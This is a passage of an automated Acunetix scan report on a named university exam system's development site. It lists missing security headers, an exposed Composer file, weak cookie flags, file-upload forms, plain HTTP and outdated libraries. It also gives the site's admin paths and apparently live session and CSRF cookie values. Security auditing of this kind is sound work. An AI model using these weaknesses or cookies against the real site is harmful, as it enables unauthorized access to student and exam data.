Acunetix verified the library version and the associated vulnerabilities with the file's unique syntax fingerprint,
which matched the syntax fingerprint expected by Acunetix.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/

Request headers
GET /assets/bower_components/jquery/jquery-3.3.1.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Clickjacking: X-Frame-Options header

Severity Low
Reported by module /httpdata/X_Frame_Options_not_implemented.js

Description

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user
into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential
information or taking control of their computer while clicking on seemingly innocuous web pages.

The server did not return an X-Frame-Options header with the value DENY or SAMEORIGIN, which means that this
website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate
whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid
clickjacking attacks, by ensuring that their content is not embedded into untrusted sites.

Impact

The impact depends on the affected web application.

Recommendation

Configure your web server to include an X-Frame-Options header and a CSP header with frame-ancestors directive.
Consult Web references for more information about the possible values for this header.

References

The X-Frame-Options response header (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options)
Clickjacking (https://en.wikipedia.org/wiki/Clickjacking)
OWASP Clickjacking (https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)
Frame Buster Buster (https://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed)

Affected items

Web Server
Details

Paths without secure XFO header:

http://dev-ubk.polindra.ac.id/auth
http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian
http://dev-ubk.polindra.ac.id/dashboard/
http://dev-ubk.polindra.ac.id/users/edit/1
http://dev-ubk.polindra.ac.id/dosen
http://dev-ubk.polindra.ac.id/hasilujian
http://dev-ubk.polindra.ac.id/ujian/master
http://dev-ubk.polindra.ac.id/jurusan
http://dev-ubk.polindra.ac.id/jurusan/add
http://dev-ubk.polindra.ac.id/kelas
http://dev-ubk.polindra.ac.id/kelasdosen
http://dev-ubk.polindra.ac.id/kelas/add
http://dev-ubk.polindra.ac.id/mahasiswa
http://dev-ubk.polindra.ac.id/settings
http://dev-ubk.polindra.ac.id/soal
http://dev-ubk.polindra.ac.id/mahasiswa/import
http://dev-ubk.polindra.ac.id/mahasiswa/preview
http://dev-ubk.polindra.ac.id/users
http://dev-ubk.polindra.ac.id/kelasdosen/add
http://dev-ubk.polindra.ac.id/dosen/
http://dev-ubk.polindra.ac.id/settings/

Request headers

GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Composer installed.json publicly accessible

Severity Low
Reported by module /location/composer_installed_json.js

Description

An installed.json file was discovered. Composer is a tool for dependency management in PHP. It allows you to declare the
libraries your project depends on and it will manage (install/update) them for you. After installing the dependencies,
Composer stores the list of them in a special file for internal purposes.

As the file is publicly accessible, it leads to disclosure of information about components used by the web application.

Impact

installed.json discloses sensitive information. This information can be used to launch further attacks.

Recommendation

Restrict access to the vendor directory.

References

Composer Basic usage (https://getcomposer.org/doc/01-basic-usage.md)

Affected items

Web Server

Details

Request headers
GET /vendor/composer/installed.json HTTP/1.1

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Cookies with missing, inconsistent or contradictory properties

Severity Low
Reported by module /RPA/Cookie_Validator.js

Description

At least one of the following cookie properties causes the cookie to be invalid or incompatible with either a different
property of the same cookie, or with the environment the cookie is being used in. Although this is not a vulnerability in itself,
it will likely lead to unexpected behavior by the application, which in turn may cause secondary security issues.

Impact

Cookies will not be stored, or submitted, by web browsers.

Recommendation

Ensure that the cookie configuration complies with the applicable standards.

References

MDN | Set-Cookie (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie)
Securing cookies with cookie prefixes (https://www.sjoerdlangkemper.nl/2017/02/09/cookie-prefixes/)
Cookies: HTTP State Management Mechanism (https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-05)
SameSite Updates - The Chromium Projects (https://www.chromium.org/updates/same-site)
draft-west-first-party-cookies-07: Same-site Cookies (https://tools.ietf.org/html/draft-west-first-party-cookies-07)

Affected items

Web Server
Verified vulnerability
Details
List of cookies with missing, inconsistent or contradictory properties:

http://dev-ubk.polindra.ac.id/auth
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login
Cookie was set with:
Set-Cookie: ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk; expires=Sat, 29-Jul-2023 18:
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian
Cookie was set with:
Set-Cookie: ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk; expires=Sat, 29-Jul-2023 18:
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login
Cookie was set with:
Set-Cookie: csrf_cookie_name=2d66993bb3924e6856ee6a1358910e71; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login
Cookie was set with:
Set-Cookie: ci_session=mfrdm65a50e2oi5ft3ag0cjavit27d1m; expires=Sat, 29-Jul-2023 18:
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/index.php
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/index.php
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dashboard/
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/edit/1
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dashboard/
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/edit_info
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/change_password
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dosen
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/hasilujian
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/ujian/master
Cookie was set with:
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20
This cookie has the following issues:
- Cookie without SameSite attribute.
When cookies lack the SameSite attribute, Web browsers may apply different and sometim

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Cookies without HttpOnly flag set

Severity Low
Reported by module /RPA/Cookie_Without_HttpOnly.js

Description

One or more cookies don't have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser
that the cookie can only be accessed by the server and not by client-side scripts. This is an important security protection for
session cookies.

Impact

Cookies can be accessed by client-side scripts.

Recommendation

If possible, you should set the HttpOnly flag for these cookies.

Affected items

Web Server
Verified vulnerability
Details
Cookies without HttpOnly flag set:

http://dev-ubk.polindra.ac.id/auth
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login
Set-Cookie: csrf_cookie_name=2d66993bb3924e6856ee6a1358910e71; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/index.php
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/index.php
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/users/edit/1
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/users/edit_info
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/users/change_password
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dosen
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/hasilujian
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/ujian/master
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/jurusan
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/jurusan/add
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dosen/delete
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Content Security Policy (CSP) not implemented

Severity Informational
Reported by module /httpdata/CSP_not_implemented.js

Description

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks,
including Cross Site Scripting (XSS) and data injection attacks.

Content Security Policy (CSP) can be implemented by adding a Content-Security-Policy header. The value of this header
is a string containing the policy directives describing your Content Security Policy. To implement CSP, you should define
lists of allowed origins for all of the types of resources that your site utilizes. For example, if you have a simple site that
needs to load scripts, stylesheets, and images hosted locally, as well as the jQuery library from its CDN, the CSP
header could look like the following:

Content-Security-Policy:
default-src 'self';
script-src 'self' https://code.jquery.com;

It was detected that your web application doesn't implement Content Security Policy (CSP) as the CSP header is missing
from the response. It's recommended to implement Content Security Policy (CSP) into your web application.

Impact

CSP can be used to prevent and/or mitigate attacks that involve content/code injection, such as cross-site scripting/XSS
attacks, attacks that require embedding a malicious resource, attacks that involve malicious use of iframes, such as
clickjacking attacks, and others.

Recommendation

It's recommended to implement Content Security Policy (CSP) into your web application. Configuring Content Security
Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control resources
the user agent is allowed to load for that page.

References

Content Security Policy (CSP) (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
Implementing Content Security Policy (https://hacks.mozilla.org/2016/02/implementing-content-security-policy/)

Affected items

Web Server
Details

Paths without CSP header:

http://dev-ubk.polindra.ac.id/auth
http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian
http://dev-ubk.polindra.ac.id/dashboard/
http://dev-ubk.polindra.ac.id/users/edit/1
http://dev-ubk.polindra.ac.id/dosen
http://dev-ubk.polindra.ac.id/hasilujian
http://dev-ubk.polindra.ac.id/ujian/master
http://dev-ubk.polindra.ac.id/jurusan
http://dev-ubk.polindra.ac.id/kelas
http://dev-ubk.polindra.ac.id/kelasdosen
http://dev-ubk.polindra.ac.id/mahasiswa
http://dev-ubk.polindra.ac.id/settings
http://dev-ubk.polindra.ac.id/soal
http://dev-ubk.polindra.ac.id/mahasiswa/import
http://dev-ubk.polindra.ac.id/users
http://dev-ubk.polindra.ac.id/kelasdosen/add
http://dev-ubk.polindra.ac.id/dosen/
http://dev-ubk.polindra.ac.id/settings/
http://dev-ubk.polindra.ac.id/soal/
http://dev-ubk.polindra.ac.id/jurusan/
http://dev-ubk.polindra.ac.id/kelas/

Request headers

GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Content type is not specified

Severity Informational
Reported by module /RPA/Content_Type_Missing.js

Description

These page(s) do not set a Content-Type header value. This value informs the browser what kind of data to expect. If
this header is missing, the browser may incorrectly handle the data. This could lead to security problems.

Impact

None

Recommendation

Set a Content-Type header value for these page(s).

Affected items

Web Server
Verified vulnerability
Details
Pages where the content-type header is not specified:

http://dev-ubk.polindra.ac.id/composer.lock

Request headers
GET /composer.lock HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

File uploads

Severity Informational
Reported by module /Crawler/12-Crawler_File_Upload.js

Description

These pages allow visitors to upload files to the server. Various web applications allow users to upload files (such as
pictures, images, sounds, ...). Uploaded files may pose a significant risk if not handled correctly. A remote attacker could
send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Impact

If the uploaded files are not safely checked, an attacker may upload malicious files.

Recommendation

Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist
approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like
.htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the
files within it are not executable. If possible, rename the files that are uploaded.

Affected items

Web Server
Details

Pages with file upload forms:

http://dev-ubk.polindra.ac.id/mahasiswa/import
Form name: <empty>
Form action: http://dev-ubk.polindra.ac.id/mahasiswa/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/soal/import
Form name: <empty>
Form action: http://dev-ubk.polindra.ac.id/soal/preview/soal
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/dosen/import
Form name: <empty>
Form action: http://dev-ubk.polindra.ac.id/dosen/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/jurusan/import
Form name: <empty>
Form action: http://dev-ubk.polindra.ac.id/jurusan/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/kelas/import
Form name: <empty>
Form action: http://dev-ubk.polindra.ac.id/kelas/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/soal/add
Form name: <empty>
Form action: http://dev-ubk.polindra.ac.id/soal/save
Form method: POST
Form file input: file_soal [file]

Request headers

GET /mahasiswa/import HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/mahasiswa

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

No HTTP Redirection

Severity Informational
Reported by module /target/http_redirections.js

Description

It was detected that your web application uses HTTP protocol, but doesn't automatically redirect users to HTTPS.

Impact

In some circumstances, it could be used for a man-in-the-middle (MitM) attack.

Recommendation

It's recommended to implement best practices of HTTP Redirection into your web application. Consult web references for
more information.

References

HTTP Redirections (https://infosec.mozilla.org/guidelines/web_security#http-redirections)

Affected items

Web Server
Details

Request headers

GET / HTTP/1.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Outdated JavaScript libraries

Severity Informational
Reported by module /Scripts/PerFile/Javascript_Libraries_Audit.script

Description

You are using an outdated version of one or more JavaScript libraries. A more recent version is available. Although your
version was not found to be affected by any security vulnerabilities, it is recommended to keep libraries up to date.

Impact

Consult References for more information.

Recommendation

Upgrade to the latest version.

Affected items

Web Server
Details

bootstrap.js 3.3.7
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/js/bootstrap.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/twbs/bootstrap/releases

Request headers

GET /assets/bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

Select2 4.0.3
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/select2.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/select2/select2/tags

Request headers

46
GET /assets/dist/auth/vendor/select2/select2.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

moment.js 2.13.0
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/moment.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/moment/moment/tags

Request headers
GET /assets/dist/auth/vendor/daterangepicker/moment.min.js HTTP/1.1
Host: dev-ubk.polindra.ac.id
Pragma: no-cache
Cache-Control: no-cache
accept-language: en-US
accept: */*
cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5
Referer: http://dev-ubk.polindra.ac.id/auth
Accept-Encoding: gzip,deflate,br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

bootstrap.js 4.0.0-beta
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/bootstrap.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/twbs/bootstrap/releases

Request headers
GET /assets/dist/auth/vendor/bootstrap/js/bootstrap.min.js HTTP/1.1
Host: dev-ubk.polindra.ac.id
Pragma: no-cache
Cache-Control: no-cache
accept-language: en-US
accept: */*
cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5
Referer: http://dev-ubk.polindra.ac.id/auth
Accept-Encoding: gzip,deflate,br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

Select2 4.0.6-rc.1
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/select2/js/select2.full.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/select2/select2/tags

Request headers
GET /assets/bower_components/select2/js/select2.full.min.js HTTP/1.1
Host: dev-ubk.polindra.ac.id
Pragma: no-cache
Cache-Control: no-cache
accept-language: en-US
accept: */*
cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Referer: http://dev-ubk.polindra.ac.id/dashboard
Accept-Encoding: gzip,deflate,br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

DataTables 1.5.6
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/dataTables.buttons.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/DataTables/DataTables/tags

Request headers
GET /assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/dataTables.buttons.min.js HTTP/1.1
Host: dev-ubk.polindra.ac.id
Pragma: no-cache
Cache-Control: no-cache
accept-language: en-US
accept: */*
cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Referer: http://dev-ubk.polindra.ac.id/dashboard
Accept-Encoding: gzip,deflate,br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

DataTables 1.10.19
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/jquery.dataTables.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/DataTables/DataTables/tags

Request headers
GET /assets/bower_components/datatables.net-bs/js/jquery.dataTables.min.js HTTP/1.1
Host: dev-ubk.polindra.ac.id
Pragma: no-cache
Cache-Control: no-cache
accept-language: en-US
accept: */*
cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
